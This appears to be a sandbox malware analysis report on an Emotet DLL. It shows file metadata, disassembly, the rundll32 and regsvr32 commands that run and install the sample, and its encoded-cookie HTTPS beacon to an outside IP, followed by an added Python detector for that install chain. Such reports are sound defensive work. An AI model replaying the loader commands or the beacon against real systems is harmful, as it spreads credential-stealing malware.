File Type: Extensible storage engine DataBase, version 0x620, checksum 0x203e0985, page size 16384, Windows version 10.0
Category: dropped
Size (bytes): 786432
Entropy (8bit): 0.25059797890736757
Encrypted: false
SSDEEP: 384:/XM+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:/XTSB2nSB2RSjlK/+mLesOj1J2
MD5: 286E0A59D9AB803C229532CF2191A9CC
SHA1: DB4EB7EF37A10ADF55D97022C8A51BA380CE1AEF
SHA-256: D6E70DA6D0E48B178619F4D96BC5DBA7C6EFB3D0AFC28FAC39A2F345D95E7AF4
SHA-512: 675882EC8D18E3A361F28A063623A2AF87AE6C9C18778843A6A7A3D33A94F315D0CB3F898E95E45F5E3CB2830133CA3C5407C48B31B312EB2D9B1250BB96396C
Malicious: false
                                                                                                                              Preview: >..... ................e.f.3...w........................)..........z..7....zc.h.(..........z....)..............3...w...........................................................................................................B...........@...................................................................................................... ............................................................................................................................................................................................................................................................z...................).......z..........................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07642731022417973
Encrypted: false
SSDEEP: 3:uzyZ7vSNikIZx/DmI0rdHZrDZoll3Vkttlmlnl:uzyZrSYrl3
MD5: E336441936F25D61CBD02EC3C4D48835
SHA1: A00684B265733FE0DDFF2C17C68B4FA7F939548C
SHA-256: F229E2F0BDBE834F0540A42F7583C16BD44AD719EB7A093778D9C0F9C5C8C8C4
SHA-512: DD94D40AF9195467605936919522ABF786B37BB408565B7C45967DF23830847C7BC0F2B9877EAF50B0194330498B3036B813423F8FE4C900D6A5AD87BDC6B27C
Malicious: false
                                                                                                                              Preview:..".....................................3...w..7....z.......z...............z.......z..7iW......z...................).......z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious: false
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
Process: C:\Program Files\Windows Defender\MpCmdRun.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category: modified
Size (bytes): 10844
Entropy (8bit): 3.1617719080513327
Encrypted: false
SSDEEP: 192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+EwZ+u:j+s+i+Z+z+B+c+Y+0g+J+j+d+u
MD5: 76BC48F9620A957AABECCE84C62FBB74
SHA1: BF58BD236615E1382B4435D3254F82FCEE3CC8A2
SHA-256: 79284D14118170848E8C20152317ED6891C93D2A0F1CE6F17523575F7E8753A8
SHA-512: 445E809604498665B103C7228A5FEDC01E29ECD2021AE733B865B95DC67C9840B60952D1BE84343041BC83A31B7C786E507498E5348A85BBE802C6560526DB44
Malicious: false
                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit): 6.482113296839602
TrID:
• Win64 Dynamic Link Library (generic) (102004/3) 86.43%
• Win64 Executable (generic) (12005/4) 10.17%
• Generic Win/DOS Executable (2004/3) 1.70%
• DOS Executable Generic (2002/1) 1.70%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name: Ns2al4764F.dll
File size: 545280
MD5: 07cf30fbb8f6645454eed3f7781d1ae5
SHA1: 3ea37e70f20524b481bcc0d33ebfc145c008925d
SHA256: 672a3c846ca7630201810bd9317f38d270a259bb76fb27ed847137b0c4528f58
SHA512: 1617aa9e14e67eaf374f0569d9c34e2ed2e04b9b0d29a66ba370668a6adf3494f2ef5375ca1f1a5ea48c3c02ed6832f2a21d35364ce595b715c39fe4005ba372
SSDEEP: 12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZJHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVR
TLSH: 93C4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
Icon Hash: 74f0e4ecccdce0e4
Entrypoint: 0x1800423a8
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x180000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x627D8598 [Thu May 12 22:09:28 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 2
File Version Major: 5
File Version Minor: 2
Subsystem Version Major: 5
Subsystem Version Minor: 2
Import Hash: b268dbaa2e6eb6acd16e04d482356598
Instruction
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
push edi
dec eax
sub esp, 20h
dec ecx
mov edi, eax
mov ebx, edx
dec eax
mov esi, ecx
cmp edx, 01h
jne 00007F0140E81D97h
call 00007F0140E83F24h
dec esp
mov eax, edi
mov edx, ebx
dec eax
mov ecx, esi
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
add esp, 20h
pop edi
jmp 00007F0140E81C40h
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 00000088h
dec eax
lea ecx, dword ptr [00014D05h]
call dword ptr [0000FC7Fh]
dec esp
mov ebx, dword ptr [00014DF0h]
dec esp
mov dword ptr [esp+58h], ebx
inc ebp
xor eax, eax
dec eax
lea edx, dword ptr [esp+60h]
dec eax
mov ecx, dword ptr [esp+58h]
call 00007F0140E9091Ah
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+50h], eax
                                                                                                                              dec eax
                                                                                                                              cmp dword ptr [esp+50h], 00000000h
                                                                                                                              je 00007F0140E81DD3h
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+38h], 00000000h
                                                                                                                              dec eax
                                                                                                                              lea eax, dword ptr [esp+48h]
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+30h], eax
                                                                                                                              dec eax
                                                                                                                              lea eax, dword ptr [esp+40h]
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+28h], eax
                                                                                                                              dec eax
                                                                                                                              lea eax, dword ptr [00014CB0h]
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+20h], eax
                                                                                                                              dec esp
                                                                                                                              mov ecx, dword ptr [esp+50h]
                                                                                                                              dec esp
                                                                                                                              mov eax, dword ptr [esp+58h]
                                                                                                                              dec eax
                                                                                                                              mov edx, dword ptr [esp+60h]
                                                                                                                              xor ecx, ecx
                                                                                                                              call 00007F0140E908C8h
                                                                                                                              jmp 00007F0140E81DB4h
                                                                                                                              dec eax
                                                                                                                              mov eax, dword ptr [eax+eax+00000000h]
Programming Language:
• [ C ] VS2008 build 21022
• [LNK] VS2008 build 21022
• [ASM] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [EXP] VS2008 build 21022
• [C++] VS2008 build 21022
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x55cf0          0x6f          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x5544c          0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5a000          0x2dffc       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x59000          0xe1c         .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x88000          0x1d8         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x52000          0x288         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type             Entropy        Characteristics
.text   0x1000           0x504ca       0x50600   False     0.389081940124   zlib compressed data  5.26882252971  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x52000          0x3d5f        0x3e00    False     0.355405745968   data                  5.39349575043  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x56000          0x20d8        0x1200    False     0.180772569444   data                  2.18161586025  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata  0x59000          0xe1c         0x1000    False     0.44580078125    data                  4.98556265168  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x5a000          0x2dffc       0x2e000   False     0.839408542799   data                  7.73448363752  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x88000          0x6f8         0x800     False     0.1796875        data                  1.81179169858  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size     Type                                    Language  Country
RT_RCDATA    0x5a0a0  0x2de00  data                                    English   United States
RT_MANIFEST  0x87ea0  0x15a    ASCII text, with CRLF line terminators  English   United States
DLL           Import
KERNEL32.dll  ExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
ole32.dll     CoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
Name                 Ordinal  Address
DllRegisterServer    1        0x180042050
DllUnregisterServer  2        0x180042080
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
May 14, 2022 04:21:52.152120113 CEST  49764        443        192.168.2.4  23.239.0.12
May 14, 2022 04:21:52.152203083 CEST  443          49764      23.239.0.12  192.168.2.4
May 14, 2022 04:21:52.152334929 CEST  49764        443        192.168.2.4  23.239.0.12
May 14, 2022 04:21:52.168875933 CEST  49764        443        192.168.2.4  23.239.0.12
May 14, 2022 04:21:52.168936968 CEST  443          49764      23.239.0.12  192.168.2.4
May 14, 2022 04:21:52.717540979 CEST  443          49764      23.239.0.12  192.168.2.4
May 14, 2022 04:21:52.717709064 CEST  49764        443        192.168.2.4  23.239.0.12
May 14, 2022 04:21:53.107435942 CEST  49764        443        192.168.2.4  23.239.0.12
May 14, 2022 04:21:53.107496023 CEST  443          49764      23.239.0.12  192.168.2.4
May 14, 2022 04:21:53.107914925 CEST  443          49764      23.239.0.12  192.168.2.4
May 14, 2022 04:21:53.107990980 CEST  49764        443        192.168.2.4  23.239.0.12
May 14, 2022 04:21:53.111130953 CEST  49764        443        192.168.2.4  23.239.0.12
May 14, 2022 04:21:53.156501055 CEST  443          49764      23.239.0.12  192.168.2.4
May 14, 2022 04:21:53.949539900 CEST  443          49764      23.239.0.12  192.168.2.4
May 14, 2022 04:21:53.949723959 CEST  443          49764      23.239.0.12  192.168.2.4
May 14, 2022 04:21:53.950025082 CEST  49764        443        192.168.2.4  23.239.0.12
May 14, 2022 04:21:53.950639963 CEST  49764        443        192.168.2.4  23.239.0.12
May 14, 2022 04:21:53.950681925 CEST  443          49764      23.239.0.12  192.168.2.4
• 23.239.0.12
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.4  49764        23.239.0.12     443               C:\Windows\System32\regsvr32.exe
Timestamp                kBytes transferred  Direction  Data
2022-05-14 02:21:53 UTC  0                   OUT        GET / HTTP/1.1
                                                        Cookie: Dyz=DabvmfULUPwRS87n3NYaWAB5lbtM+RX1RWCxIsW5JR2ugrMjYBp820HE70OdzwJs7yvgQCtqT9ZajKoH765EieJsgJY5Ki8zTzKQ99Gho8WMqwDn4OyZsaEfNbr84GkPPx5HtU7nHZMAlr2v3mlg410lium/3Uzv2iMM+QbLckLf53rpF7ndEZLZxV5q4uD1NTdffI52CoPOk7Ky1CgFUQCgYCDOBhB/qP6OSm4ZCqhqrMM5PSKhRo5dTpg29g==
                                                        Host: 23.239.0.12
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
2022-05-14 02:21:53 UTC  0                   IN         HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 14 May 2022 02:21:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close



Target ID: 0
Start time: 04:21:15
Start date: 14/05/2022
Path: C:\Windows\System32\loaddll64.exe
Wow64 process (32bit): false
Commandline: loaddll64.exe "C:\Users\user\Desktop\Ns2al4764F.dll"
Imagebase: 0x7ff7e39a0000
File size: 140288 bytes
MD5 hash: 4E8A40CAD6CCC047914E3A7830A2D8AA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 1
Start time: 04:21:15
Start date: 14/05/2022
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
Imagebase: 0x7ff7bb450000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 04:21:15
Start date: 14/05/2022
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dll
Imagebase: 0x7ff6a4800000
File size: 24064 bytes
MD5 hash: D78B75FC68247E8A63ACBA846182740E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.243462226.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID: 3
Start time: 04:21:15
Start date: 14/05/2022
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
Imagebase: 0x7ff6ecae0000
File size: 69632 bytes
MD5 hash: 73C519F050C20580F8A62C849D49215A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.240757372.0000014E051B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID: 4
Start time: 04:21:16
Start date: 14/05/2022
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllRegisterServer
Imagebase: 0x7ff6ecae0000
                                                                                                                              File size:69632 bytes
                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.240813581.000002BE35AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              Target ID:5
                                                                                                                              Start time:04:21:19
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll"
                                                                                                                              Imagebase:0x7ff6a4800000
                                                                                                                              File size:24064 bytes
                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.758443733.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              Target ID:6
                                                                                                                              Start time:04:21:19
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllUnregisterServer
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:69632 bytes
                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
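
The four loader records above (Targets 3 to 6) are the install chain worth a detection rule: rundll32 runs the dropped sample from the user's Desktop, first via ordinal #1 and then via DllRegisterServer, after which regsvr32 loads a copy with a generated name from a generated subdirectory of System32, and the sample is finally unregistered. The script below is an added example and is not part of the Joe Sandbox report: it replays those command lines (copied from the records above, together with two benign records as a control) through a small process-creation detector. The record tuple layout, the short list of user-writable directories and the case-switch heuristic for generated names are this example's own assumptions, not anything the report defines.

```python
"""Detection over the loader records shown above.

Added example, not part of the Joe Sandbox report: the records are copied
from the report, the record layout and the heuristics are assumptions."""
import re
from pathlib import PureWindowsPath

# (target id, image path, command line), copied from Targets 3, 4, 5, 6, 10
# and 28 above; constructed as the sample input for this example.
RECORDS = [
    (3, r"C:\Windows\System32\rundll32.exe",
     r'rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1'),
    (4, r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllRegisterServer"),
    (5, r"C:\Windows\System32\regsvr32.exe",
     r'C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll"'),
    (6, r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllUnregisterServer"),
    (10, r"C:\Windows\System32\svchost.exe",
     r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
    (28, r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     r'"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable'),
]

LOADERS = {"rundll32.exe", "regsvr32.exe"}
# Directories an unprivileged user can write to (assumption: a short list
# is enough for this example; a production rule would carry the full set).
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")

# First .dll argument, quoted or bare; a bare path ends at ',' or whitespace.
DLL_RE = re.compile(r'"([^"]+?\.dll)"|(\S+?\.dll)(?=[,\s]|$)', re.IGNORECASE)
# rundll32 export name: the token after 'file.dll,' (e.g. #1, DllRegisterServer).
EXPORT_RE = re.compile(r'\.dll"?,(\S+)', re.IGNORECASE)


def dll_argument(cmdline):
    """Path of the DLL handed to the loader, or None if there is none."""
    m = DLL_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def loader_export(cmdline):
    """Export name rundll32 was asked to call, or None."""
    m = EXPORT_RE.search(cmdline)
    return m.group(1) if m else None


def looks_random(name):
    """Heuristic for generated names such as GfWDwmUjKsXua: at least 8 letters
    and a case switch on 40% or more of adjacent letter pairs."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 8:
        return False
    switches = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return switches / len(letters) >= 0.4


def classify(image, cmdline):
    """Findings for one process-creation record as (tag, detail) pairs."""
    findings = []
    loader = PureWindowsPath(image).name.lower()
    dll = dll_argument(cmdline) if loader in LOADERS else None
    if dll is None:
        return findings
    parts = PureWindowsPath(dll).parts
    if any(marker in dll.lower() for marker in USER_WRITABLE):
        findings.append(("user_writable_dll", dll))
    # A DLL one directory below System32 (parts: drive, Windows, System32,
    # subdir, file) where the subdirectory name looks generated.
    if (len(parts) == 5 and parts[1].lower() == "windows"
            and parts[2].lower() == "system32" and looks_random(parts[3])):
        findings.append(("system32_subdir_dll", dll))
    export = loader_export(cmdline)
    if loader == "rundll32.exe" and export and export.lower() in (
            "dllregisterserver", "dllunregisterserver"):
        findings.append(("com_register_export", export))
    return findings


def tags(image, cmdline):
    """Set of finding tags for a record."""
    return {tag for tag, _ in classify(image, cmdline)}


def emotet_install_chain(records):
    """True when rundll32 calls DllRegisterServer on a DLL in a user-writable
    path and a later record shows regsvr32 loading a DLL from a random-named
    System32 subdirectory: the sample handing off to its installed copy."""
    staged = False
    for _tid, image, cmdline in sorted(records):
        found = dict(classify(image, cmdline))
        if "user_writable_dll" in found and found.get("com_register_export", "").lower() == "dllregisterserver":
            staged = True
        elif staged and "system32_subdir_dll" in found and PureWindowsPath(image).name.lower() == "regsvr32.exe":
            return True
    return False


if __name__ == "__main__":
    for tid, image, cmdline in RECORDS:
        for tag, detail in classify(image, cmdline):
            print(f"target {tid}: {tag} -> {detail}")
    print("Emotet install chain observed:", emotet_install_chain(RECORDS))
```

Run stand-alone, the script reports the user-writable DLL and the COM registration export for Targets 4 and 6, the generated System32 subdirectory for Target 5, nothing for svchost.exe and MpCmdRun.exe, and confirms the chain. Each finding on its own is noisy (installers legitimately call rundll32 with DllRegisterServer); the sequence of a user-profile DLL registered through rundll32 followed by regsvr32 loading from a generated System32 subdirectory is the part worth alerting on, and on a real endpoint the two records should additionally be tied together by parent process, which this section of the report does not list.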

Target ID:10
Start time:04:21:36
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:11
Start time:04:21:40
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:12
Start time:04:21:40
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:13
Start time:04:21:41
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:15
Start time:04:21:42
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:16
Start time:04:21:43
Start date:14/05/2022
Path:C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\SgrmBroker.exe
Imagebase:0x7ff6edbf0000
File size:163336 bytes
MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:17
Start time:04:21:43
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:18
Start time:04:21:44
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:19
Start time:04:21:45
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff7338d0000
File size:51288 bytes
